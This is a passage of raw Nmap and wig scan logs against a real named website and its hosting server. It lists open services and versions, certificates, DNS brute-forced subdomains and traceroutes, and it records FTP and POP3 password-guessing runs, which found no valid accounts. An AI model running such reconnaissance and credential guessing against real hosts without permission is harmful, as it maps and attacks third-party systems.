- 110/tcp open pop3 syn-ack Dovecot DirectAdmin pop3d
- |_pop3-capabilities: PIPELINING TOP SASL(PLAIN) UIDL AUTH-RESP-CODE CAPA USER RESP-CODES STLS
- |_ssl-date: TLS randomness does not represent time
- 143/tcp open imap syn-ack Dovecot imapd
- |_imap-capabilities: ID LITERAL+ more have post-login capabilities IMAP4rev1 LOGIN-REFERRALS listed IDLE AUTH=PLAINA0001 STARTTLS Pre-login ENABLE SASL-IR OK
- |_ssl-date: TLS randomness does not represent time
- 443/tcp open ssl/http syn-ack nginx
- | http-methods:
- |_ Supported Methods: GET HEAD POST
- |_http-server-header: nginx
- |_http-title: Secured Home of babylon-woodline.co.il
- | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
- | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha1WithRSAEncryption
- | Not valid before: 2014-09-20T10:18:07
- | Not valid after: 2042-02-04T10:18:07
- | MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
- | SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
- | -----BEGIN CERTIFICATE-----
- | MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
- | VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
- | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
- | MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
- | MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
- | ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
- | A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
- | ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
- | AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
- | bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
- | WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
- | CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
- | 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
- | 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
- | b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
- | 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
- | 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
- | WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
- | hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
- | Mkh66D1gfgB2ubts
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- | tls-alpn:
- | h2
- |_ http/1.1
- | tls-nextprotoneg:
- | h2
- |_ http/1.1
- 465/tcp open ssl/smtp syn-ack Exim smtpd 4.91
- |_smtp-commands: SMTP EHLO babylon-woodline.co.il: failed to receive data: failed to receive data
- | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/emailAddress=webaster@localhost/organizationalUnitName=none/localityName=Sometown
- | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/emailAddress=webaster@localhost/organizationalUnitName=none/localityName=Sometown
- | Public Key type: rsa
- | Public Key bits: 1024
- | Signature Algorithm: sha1WithRSAEncryption
- | Not valid before: 2014-07-29T06:26:14
- | Not valid after: 2041-12-13T06:26:14
- | MD5: 4b29 2c8a 525a d420 e4f7 78c1 45d2 4ed9
- | SHA-1: cc0a 349f 83d9 4d41 d316 0e7a a751 ce8d 5322 7241
- | -----BEGIN CERTIFICATE-----
- | MIICkTCCAfoCCQD3JF1s3Ui7BzANBgkqhkiG9w0BAQUFADCBjDELMAkGA1UEBhMC
- | R0IxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
- | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEh
- | MB8GCSqGSIb3DQEJARYSd2ViYXN0ZXJAbG9jYWxob3N0MB4XDTE0MDcyOTA2MjYx
- | NFoXDTQxMTIxMzA2MjYxNFowgYwxCzAJBgNVBAYTAkdCMRUwEwYDVQQIEwxTb21l
- | cHJvdmluY2UxETAPBgNVBAcTCFNvbWV0b3duMQ0wCwYDVQQKEwRub25lMQ0wCwYD
- | VQQLEwRub25lMRIwEAYDVQQDEwlsb2NhbGhvc3QxITAfBgkqhkiG9w0BCQEWEndl
- | YmFzdGVyQGxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA5Euc
- | SYOuqLn4h5hktsteODz8pR6VsFNktHT+tgSHoEPeJ/2S1efAY/zoMRhwXo9k9RVc
- | S11EDYVjzGrQeni2/o0rFC3kCJI37P4AHbaQg7BJlyqVW9BHQaHW++gknGH8L2XF
- | DC97iiawhWQIEF06Hg8319FHZZBdTEi3w5A0R10CAwEAATANBgkqhkiG9w0BAQUF
- | AAOBgQBT5tKhGxu0mGTfi9dP8q21FSzhyR9G5n7uGL/+3Bl7Six7w9l+4HOy3zMl
- | VvJTXWh+FGInAytzBf4BzC3D84qo13B8w13tivpdNf1o1WV65fgBZZTmak/KCbZf
- | 9BHpO92XZPxlmPCEPoMmyXN0dVM8jZmbI6LvFZZS1EBIPx9fng==
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- 587/tcp open smtp syn-ack Exim smtpd 4.91
- |_smtp-commands: SMTP: EHLO 550 Bad HELO - Host impersonating domain name [babylon-woodline.co.il]\x0D
- 993/tcp open ssl/imaps? syn-ack
- |_ssl-date: TLS randomness does not represent time
- 995/tcp open ssl/pop3s? syn-ack
- |_ssl-date: TLS randomness does not represent time
- 2000/tcp open tcpwrapped syn-ack
- 2222/tcp open http syn-ack DirectAdmin httpd 1.53.0 (Registered to webid.co.il)
- |_http-favicon: Unknown favicon MD5: F0CC6DDDAE553AA7CFEB2CA5B62B2083
- | http-methods:
- |_ Supported Methods: GET HEAD POST
- |_http-title: Site doesn't have a title (text/html).
- |_http-trane-info: Problem with XML parsing of /evox/about
- 3306/tcp open mysql syn-ack MySQL 5.5.60-MariaDB
- | mysql-info:
- | Protocol: 10
- | Version: 5.5.60-MariaDB
- | Thread ID: 11696681
- | Capabilities flags: 63487
- | Some Capabilities: ODBCClient, Speaks41ProtocolOld, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsTransactions, Support41Auth, SupportsCompression, FoundRows, Speaks41ProtocolNew, InteractiveClient, IgnoreSigpipes, LongPassword, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
- | Status: Autocommit
- | Salt: -y>fhYbaBeV`_=P\^DuB
- |_ Auth Plugin Name: mysql_native_password
- 5060/tcp open tcpwrapped syn-ack
- 8080/tcp open ssl/http-proxy syn-ack Apache/2
- | http-methods:
- |_ Supported Methods: GET HEAD POST OPTIONS
- |_http-open-proxy: Proxy might be redirecting requests
- |_http-server-header: Apache/2
- | http-title: \xD7\x9E\xD7\x96\xD7\xA8\xD7\x95\xD7\xA0\xD7\x99\xD7\x9D \xD7\x9C\xD7\x99\xD7\x99\xD7\x9F
- |_Requested resource was /index.1.html
- 8081/tcp open ssl/ssl syn-ack Apache httpd (SSL-only mode)
- | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
- | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha1WithRSAEncryption
- | Not valid before: 2014-09-20T10:18:07
- | Not valid after: 2042-02-04T10:18:07
- | MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
- | SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
- | -----BEGIN CERTIFICATE-----
- | MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
- | VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
- | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
- | MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
- | MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
- | ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
- | A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
- | ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
- | AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
- | bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
- | WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
- | CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
- | 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
- | 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
- | b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
- | 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
- | 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
- | WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
- | hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
- | Mkh66D1gfgB2ubts
- |_-----END CERTIFICATE-----
- |_ssl-date: TLS randomness does not represent time
- | tls-alpn:
- |_ http/1.1
- OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
- Aggressive OS guesses: Linux 2.6.32 (93%), Linux 2.6.32 or 3.10 (93%), WatchGuard Fireware 11.8 (93%), Synology DiskStation Manager 5.1 (92%), Linux 2.6.39 (92%), Linux 3.4 (92%), Linux 3.1 - 3.2 (92%), Linux 3.10 (91%), Linux 2.6.32 - 2.6.39 (90%), Linux 2.6.32 - 3.0 (89%)
- No exact OS matches for host (test conditions non-ideal).
- TCP/IP fingerprint:
- SCAN(V=7.70SVN%E=4%D=1/23%OT=21%CT=1%CU=%PV=N%DS=17%DC=T%G=N%TM=5C483E64%P=x86_64-unknown-linux-gnu)
- SEQ(SP=100%GCD=1%ISR=108%TI=Z%II=I%TS=A)
- SEQ(SP=100%GCD=1%ISR=108%TI=Z%TS=A)
- OPS(O1=M4B3ST11NW7%O2=M4B3ST11NW7%O3=M4B3NNT11NW7%O4=M4B3ST11NW7%O5=M4B3ST11NW7%O6=M4B3ST11)
- WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)
- ECN(R=Y%DF=Y%TG=40%W=3908%O=M4B3NNSNW7%CC=Y%Q=)
- T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
- T2(R=N)
- T3(R=N)
- T4(R=N)
- T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
- T6(R=N)
- T7(R=N)
- U1(R=N)
- IE(R=Y%DFI=N%TG=40%CD=S)
- Uptime guess: 25.505 days (since Fri Dec 28 17:06:06 2018)
- Network Distance: 17 hops
- TCP Sequence Prediction: Difficulty=256 (Good luck!)
- IP ID Sequence Generation: All zeros
- Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 145.48 ms 10.246.200.1
- 2 148.22 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
- 3 147.04 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
- 4 145.67 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 178.68 ms 62.115.119.76
- 6 178.15 ms 62.115.133.79
- 7 177.96 ms ffm-b1-link.telia.net (62.115.116.158)
- 8 178.71 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
- 9 ...
- 10 231.84 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 11 229.29 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
- 12 230.00 ms 212.143.7.247
- 13 230.16 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
- 14 235.77 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
- 15 231.62 ms 82.166.37.254
- 16 232.69 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 17 231.57 ms server.webid.co.il (62.90.134.182)
- NSE: Script Post-scanning.
- NSE: Starting runlevel 1 (of 3) scan.
- Initiating NSE at 05:13
- Completed NSE at 05:13, 0.00s elapsed
- NSE: Starting runlevel 2 (of 3) scan.
- Initiating NSE at 05:13
- Completed NSE at 05:13, 0.00s elapsed
- NSE: Starting runlevel 3 (of 3) scan.
- Initiating NSE at 05:13
- Completed NSE at 05:13, 0.00s elapsed
- Read data files from: /usr/local/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 285.87 seconds
- Raw packets sent: 100 (7.834KB) | Rcvd: 1149 (559.312KB)
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:13 EST
- NSE: Loaded 149 scripts for scanning.
- NSE: Script Pre-scanning.
- Initiating NSE at 05:13
- Completed NSE at 05:13, 0.00s elapsed
- Initiating NSE at 05:13
- Completed NSE at 05:13, 0.00s elapsed
- Initiating NSE at 05:13
- Completed NSE at 05:13, 0.00s elapsed
- Initiating Parallel DNS resolution of 1 host. at 05:13
- Completed Parallel DNS resolution of 1 host. at 05:13, 0.02s elapsed
- Initiating UDP Scan at 05:13
- Scanning babylon-woodline.co.il (62.90.134.182) [13 ports]
- Discovered open port 53/udp on 62.90.134.182
- Completed UDP Scan at 05:14, 4.61s elapsed (13 total ports)
- Initiating Service scan at 05:14
- Scanning 1 service on babylon-woodline.co.il (62.90.134.182)
- Completed Service scan at 05:14, 0.23s elapsed (1 service on 1 host)
- Initiating OS detection (try #1) against babylon-woodline.co.il (62.90.134.182)
- Retrying OS detection (try #2) against babylon-woodline.co.il (62.90.134.182)
- Initiating Traceroute at 05:14
- Completed Traceroute at 05:14, 7.22s elapsed
- Initiating Parallel DNS resolution of 1 host. at 05:14
- Completed Parallel DNS resolution of 1 host. at 05:14, 0.02s elapsed
- NSE: Script scanning 62.90.134.182.
- Initiating NSE at 05:14
- Completed NSE at 05:14, 0.47s elapsed
- Initiating NSE at 05:14
- Completed NSE at 05:14, 0.00s elapsed
- Initiating NSE at 05:14
- Completed NSE at 05:14, 0.00s elapsed
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up (0.23s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- PORT STATE SERVICE VERSION
- 53/udp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
- | dns-nsid:
- |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
- 67/udp closed dhcps
- 68/udp closed dhcpc
- 69/udp closed tftp
- 88/udp closed kerberos-sec
- 123/udp closed ntp
- 137/udp filtered netbios-ns
- 138/udp filtered netbios-dgm
- 139/udp closed netbios-ssn
- 162/udp closed snmptrap
- 389/udp closed ldap
- 520/udp closed route
- 2049/udp closed nfs
- Too many fingerprints match this host to give specific OS details
- Network Distance: 17 hops
- Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- TRACEROUTE (using port 138/udp)
- HOP RTT ADDRESS
- 1 ... 7
- 8 142.93 ms 10.246.200.1
- 9 ... 10
- 11 148.28 ms 10.246.200.1
- 12 143.06 ms 10.246.200.1
- 13 143.06 ms 10.246.200.1
- 14 143.06 ms 10.246.200.1
- 15 143.05 ms 10.246.200.1
- 16 143.05 ms 10.246.200.1
- 17 143.07 ms 10.246.200.1
- 18 ...
- 19 145.09 ms 10.246.200.1
- 20 143.55 ms 10.246.200.1
- 21 ... 28
- 29 147.56 ms 10.246.200.1
- 30 144.82 ms 10.246.200.1
- NSE: Script Post-scanning.
- Initiating NSE at 05:14
- Completed NSE at 05:14, 0.00s elapsed
- Initiating NSE at 05:14
- Completed NSE at 05:14, 0.00s elapsed
- Initiating NSE at 05:14
- Completed NSE at 05:14, 0.00s elapsed
- Read data files from: /usr/local/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 17.32 seconds
- Raw packets sent: 123 (5.705KB) | Rcvd: 1819 (484.907KB)
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:14 EST
- Nmap scan report for babylon-woodline.co.il (62.90.134.182)
- Host is up (0.23s latency).
- rDNS record for 62.90.134.182: server.webid.co.il
- Not shown: 17 closed ports, 1 filtered port
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 443/tcp open https
- 993/tcp open imaps
- 3306/tcp open mysql
- 8080/tcp open http-proxy
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
- Nmap scan report for server.webid.co.il (62.90.134.182)
- Host is up (0.23s latency).
- Not shown: 336 closed ports, 124 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 2000/tcp open cisco-sccp
- 2222/tcp open EtherNetIP-1
- 3306/tcp open mysql
- 5060/tcp open sip
- 8080/tcp open http-proxy
- 8081/tcp open blackice-icecap
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
- Nmap scan report for server.webid.co.il (62.90.134.182)
- Host is up (0.21s latency).
- Not shown: 10 closed ports, 2 filtered ports
- PORT STATE SERVICE
- 53/udp open domain
- ######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
- NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
- NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
- NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
- Nmap scan report for server.webid.co.il (62.90.134.182)
- Host is up (0.23s latency).
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- | ftp-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 2604 guesses in 180 seconds, average tps: 14.2
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|storage-misc|firewall|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), WatchGuard Fireware 11.8 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 17 hops
- Service Info: OS: Unix
- TRACEROUTE (using port 21/tcp)
- HOP RTT ADDRESS
- 1 146.37 ms 10.246.200.1
- 2 146.44 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
- 3 146.43 ms 176.10.83.34
- 4 146.42 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 178.37 ms prag-bb1-link.telia.net (80.91.247.82)
- 6 178.42 ms ffm-bb3-link.telia.net (62.115.121.118)
- 7 178.45 ms ffm-b1-link.telia.net (62.115.121.7)
- 8 179.25 ms 80.239.196.190
- 9 ...
- 10 233.20 ms gw2-3-1-4-hfa-gw2-fra.nv.net.il (212.143.12.76)
- 11 235.52 ms 212.143.7.22
- 12 237.42 ms core1-rha2-0-0-core1-hfa.nv.net.il (207.232.0.17)
- 13 236.62 ms core1-rha-1-0-0-core1-hfa-5-0-7.nv.net.il (212.143.12.117)
- 14 237.42 ms 212.143.201.190
- 15 230.82 ms 82-166-37-254.barak-online.net (82.166.37.254)
- 16 231.70 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 17 232.39 ms server.webid.co.il (62.90.134.182)
- ######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:25 EST
- Nmap scan report for server.webid.co.il (62.90.134.182)
- Host is up (0.23s latency).
- PORT STATE SERVICE VERSION
- 53/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
- |_dns-fuzz: Server didn't response to our probe, can't fuzz
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- | dns-nsid:
- |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
- |_dns-zone-transfer: ERROR: Script execution failed (use -d to debug)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 17 hops
- Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
- Host script results:
- | dns-blacklist:
- | SPAM
- |_ l2.apews.org - SPAM
- | dns-brute:
- | DNS Brute-force hostnames:
- | ns1.webid.co.il - 62.90.134.182
- | ns2.webid.co.il - 212.150.246.99
- | mail.webid.co.il - 62.90.134.182
- | www.webid.co.il - 62.90.134.182
- | cms.webid.co.il - 62.90.134.182
- | ftp.webid.co.il - 62.90.134.182
- | server.webid.co.il - 62.90.134.182
- |_ smtp.webid.co.il - 62.90.134.182
- TRACEROUTE (using port 53/tcp)
- HOP RTT ADDRESS
- 1 145.16 ms 10.246.200.1
- 2 145.25 ms 193.9.115.113
- 3 145.22 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
- 4 145.25 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 177.07 ms 80.91.253.248
- 6 177.12 ms ffm-bb3-link.telia.net (62.115.121.118)
- 7 180.34 ms ffm-b1-link.telia.net (62.115.116.160)
- 8 180.31 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
- 9 ...
- 10 231.35 ms 212.143.12.76
- 11 232.67 ms core1-0-1-0-2-gw2.hfa.nv.net.il (212.143.7.41)
- 12 233.83 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
- 13 235.90 ms 212.143.201.205
- 14 235.84 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
- 15 231.43 ms 82-166-37-254.barak-online.net (82.166.37.254)
- 16 232.20 ms 62-90-134-178.barak.net.il (62.90.134.178)
- 17 233.34 ms server.webid.co.il (62.90.134.182)
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://62.90.134.182...
- _________________________________________ SITE INFO _________________________________________
- IP Title
- 62.90.134.182
- __________________________________________ VERSION __________________________________________
- Name Versions Type
- Roundcube CMS
- phpMyAdmin CMS
- Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.4 | 2.4.5 | 2.4.6 | 2.4.7 Platform
- 2.4.8 | 2.4.9
- _____________________________________________________________________________________________
- Time: 29.4 sec Urls: 446 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 200 OK
- Server: nginx
- Date: Wed, 23 Jan 2019 09:27:50 GMT
- Content-Type: text/html
- Content-Length: 43
- Connection: keep-alive
- Vary: Accept-Encoding
- X-Accel-Version: 0.01
- Last-Modified: Mon, 18 Jun 2018 11:43:36 GMT
- ETag: "2b-56ee9136e8a00"
- Accept-Ranges: bytes
- Vary: User-Agent
- #######################################################################################################################################
- Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:27 EST
- NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
- NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
- NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
- Nmap scan report for server.webid.co.il (62.90.134.182)
- Host is up (0.23s latency).
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot DirectAdmin pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 225 guesses in 183 seconds, average tps: 1.3
- |_pop3-capabilities: CAPA UIDL RESP-CODES STLS USER AUTH-RESP-CODE SASL(PLAIN) PIPELINING TOP
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|firewall|storage-misc|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 16 hops
- TRACEROUTE (using port 110/tcp)
- HOP RTT ADDRESS
- 1 146.19 ms 10.246.200.1
- 2 146.97 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
- 3 174.77 ms 176.10.83.34
- 4 146.97 ms sfia-b2-link.telia.net (62.115.148.144)
- 5 178.41 ms win-bb2-link.telia.net (62.115.119.76)
- 6 179.05 ms ffm-bb4-link.telia.net (62.115.133.79)
- 7 178.40 ms ffm-b1-link.telia.net (62.115.121.1)
- 8 179.09 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
- 9 ...
- 10 233.92 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
